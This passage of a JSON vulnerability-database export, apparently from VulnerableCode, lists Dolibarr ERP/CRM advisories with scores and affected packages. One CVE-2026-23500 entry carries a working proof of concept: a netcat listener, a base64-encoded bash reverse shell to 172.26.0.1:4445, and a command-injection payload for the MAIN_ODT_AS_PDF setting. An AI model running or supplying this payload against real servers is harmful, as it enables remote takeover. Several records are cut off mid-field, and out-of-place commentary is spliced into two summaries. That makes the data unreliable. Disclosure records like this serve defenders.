lnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-7khd-yhd5-6ydu"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3
km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-10095","GHSA-p2fm-8rhj-58fr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w8pm-m6yc-5bfb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/34571?format=json","vulnerability_id":"VCID-wa9k-affu-zuen","summary":"Cross-site Scripting (XSS) in dolibarr/dolibarr\nCross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 
16.0.5.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5842","reference_id":"","reference_type":"","scores":[{"value":"0.0012","scoring_system":"epss","scoring_elements":"0.3055","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5842"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c"},{"reference_url":"https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/"}],"url":"https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-58
42","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5842"},{"reference_url":"https://github.com/advisories/GHSA-9pjf-jw9q-fx49","reference_id":"GHSA-9pjf-jw9q-fx49","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9pjf-jw9q-fx49"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66950?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.5"}],"aliases":["CVE-2023-5842","GHSA-9pjf-jw9q-fx49"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wa9k-affu-zuen"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15579?format=json","vulnerability_id":"VCID-whjj-q5zp-tfef","summary":"Dolibarr user with permission to edit PHP content can bypass filtering to restrict dangerous PHP functions\nIn the Website module of Dolibarr ERP & CRM 22.0.4 and below, the application uses blacklist-based filtering to restrict dangerous PHP functions related to system command execution. 
An authenticated user with permission to edit PHP content can bypass this denylist, resulting in full remote code execution with the ability to execute arbitrary operating system commands on the server. No fixed version is recorded in this entry (fixed_packages is empty); until a patched release is confirmed, treat the Website module's PHP-editing permission as equivalent to code execution on the host and grant it accordingly.
/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31019"},{"reference_url":"https://github.com/advisories/GHSA-j2g9-rprv-hrhc","reference_id":"GHSA-j2g9-rprv-hrhc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-j2g9-rprv-hrhc"}],"fixed_packages":[],"aliases":["CVE-2026-31019","GHSA-j2g9-rprv-hrhc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-whjj-q5zp-tfef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15759?format=json","vulnerability_id":"VCID-x3pg-81y2-ruga","summary":"Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration\n### Summary\nAn authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.\n\n### Details\nThe vulnerability is located in `htdocs/includes/odtphp/odf.php`.\nWhen the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.\n\nCode snippet (`htdocs/includes/odtphp/odf.php`, approx line 930):\n```php\n$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);\n// ...\nexec($command, $output_arr, $retval);\n```\n\nWhile the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.\n\n### PoC\n**Prerequisites:**\n1. Login as an Administrator.\n2. 
Ensure the \"Commercial Proposals\" module is enabled and \"ODT templates\" are activated in its setup.\n\n**Steps to reproduce (Reverse Shell):**\n\n1.  Start a netcat listener on the attacker's machine (IP: `172.26.0.1`, Port: `4445`):\n   ```bash\n   nc -lvnp 4445\n   ```\n\n2. Prepare the payload. To avoid issues with special characters (like `&` or `>`) being escaped by the web application or shell, encode the reverse shell command in Base64:\n   ```bash\n   # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'\n   echo \"bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'\" | base64\n   # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK\n   ```\n\n3. Navigate to **Home -> Setup -> Other Setup**.\n\n4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:\n   ```bash\n   jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash\n   ```\n   *(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*\n<img width=\"1898\" height=\"696\" alt=\"image\" src=\"https://github.com/user-attachments/assets/12e4aa61-eb9d-4342-bd03-9a1e824b8316\" />\n\n5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.\n<img width=\"1907\" height=\"668\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d790847e-50c1-47eb-994b-b2596b949242\" />\n<img width=\"1858\" height=\"346\" alt=\"image\" src=\"https://github.com/user-attachments/assets/afbeb170-d004-49d6-a395-1b4572fbf2e7\" />\n<img width=\"848\" height=\"183\" alt=\"image\" src=\"https://github.com/user-attachments/assets/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1\" />\n\n6. Check the netcat listener. 
A connection will be established, granting a shell on the server:\n \n<img width=\"616\" height=\"193\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e90817da-9bb2-4fe1-8377-be10d8640e37\" />\n\n\n### Impact\n**Remote Code Execution (RCE).**\nAn attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:\n- Reading sensitive configuration files (database credentials).\n- Modifying application code.\n- Full system compromise depending on server configuration (e.g., docker escape, pivoting).\n\n---\n\n### Credits\nReported by Łukasz Rybak","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23500","reference_id":"","reference_type":"","scores":[{"value":"0.00166","scoring_system":"epss","scoring_elements":"0.37427","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23500"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements
":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/"}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/"}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23500","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23500"},{"reference_url":"https://github.com/advisories/GHSA-w5j3-8fcr-h87w","reference_id":"GHSA-w5j3-8fcr-h87w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-w5j3-8fcr-h87w"}],"fixed_packages":[],"aliases":["CVE-2026-23500","GHSA-w5j3-8fcr-h87w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x3pg-81y2-ruga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35745?format=json","vulnerability_id":"VCID-xuha-w2yw-5fa6","summary":"File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the 
extension filtering and renaming functions. (Note: the fixed_packages entry in this record lists 17.0.1 as not vulnerable, which conflicts with the \"v.17.0.1 and before\" range stated above; confirm the exact affected versions against the vendor changelog or the Akerva advisory before relying on either.)
"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38887"},{"reference_url":"https://github.com/advisories/GHSA-g8h7-mcp6-pf47","reference_id":"GHSA-g8h7-mcp6-pf47","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-g8h7-mcp6-pf47"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67967?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38887","GHSA-g8h7-mcp6-pf47"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xuha-w2yw-5fa6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53437?format=json","vulnerability_id":"VCID-y9z1-u3rc-yub6","summary":"Dolibarr SQL injection vulnerability\nDolibarr ERP/CRM is affected by multiple SQL injection vulnerabilities in versions through 7.0.0 via comm/propal/list.php (viewstatut parameter) or comm/propal/list.php (propal_statut parameter, aka search_statut 
parameter).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18260","reference_id":"","reference_type":"","scores":[{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44454","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18260"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18260","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18260"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-010","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-010"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/180056?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCI
D-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2017-18260","GHSA-9986-6m4g-25f6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resou
rce_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y9z1-u3rc-yub6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56049?format=json","vulnerability_id":"VCID-yrys-ch5x-23bv","summary":"Dolibarr Cross-site Scripting via the qty parameter in product/fournisseurs.php\nDolibarr ERP/CRM 3.0 through 10.0.3 allows XSS via the qty parameter to product/fournisseurs.php (product price screen).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19212","reference_id":"","reference_type":"","scores":[{"value":"0.01154","scoring_system":"epss","scoring_elements":"0.78831","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19212"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://herolab.usd.de/en/security-advisories","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/en/security-advisories"},{"reference_url":"https://herolab.usd.de/security-advisories/usd-2019-0054","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/security-advisories/usd-2019-0054"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19212","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR
:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19212"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/443000?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"}
,{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4"}],"aliases":["CVE-2019-19212","GHSA-pm57-926c-28mr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yrys-ch5x-23bv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61208?format=json","vulnerability_id":"VCID-zve5-afaq-mkh8","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nDolibarr ERP/CRM through 8.0.3 has `/exports/export.php?datatoexport=` XSS.","references":[{"reference_url":"http://packetstormsecurity.com/files/150623/Dolibarr-ERP-CRM-8.0.3-Cross-Site-Scripting.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/150623/Dolibarr-ERP-CRM-8.0.3-Cross-Site-Scripting.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-19799","reference_id":"","reference_type":"","scores":[{"value":"0.0218","scoring_system":"epss","scoring_elements":"0.84623","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-19799"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-19799","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-19799"
},{"reference_url":"https://pentest.com.tr/exploits/Dolibarr-ERP-CRM-8-0-3-Cross-Site-Scripting.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://pentest.com.tr/exploits/Dolibarr-ERP-CRM-8-0-3-Cross-Site-Scripting.html"},{"reference_url":"https://www.exploit-db.com/exploits/45945","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.exploit-db.com/exploits/45945"},{"reference_url":"https://www.exploit-db.com/exploits/45945/","reference_id":"","reference_type":"","scores":[],"url":"https://www.exploit-db.com/exploits/45945/"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/45945.txt","reference_id":"CVE-2018-19799","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/45945.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/122316?format=json","purl":"pkg:composer/dolibarr/dolibarr@8.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VC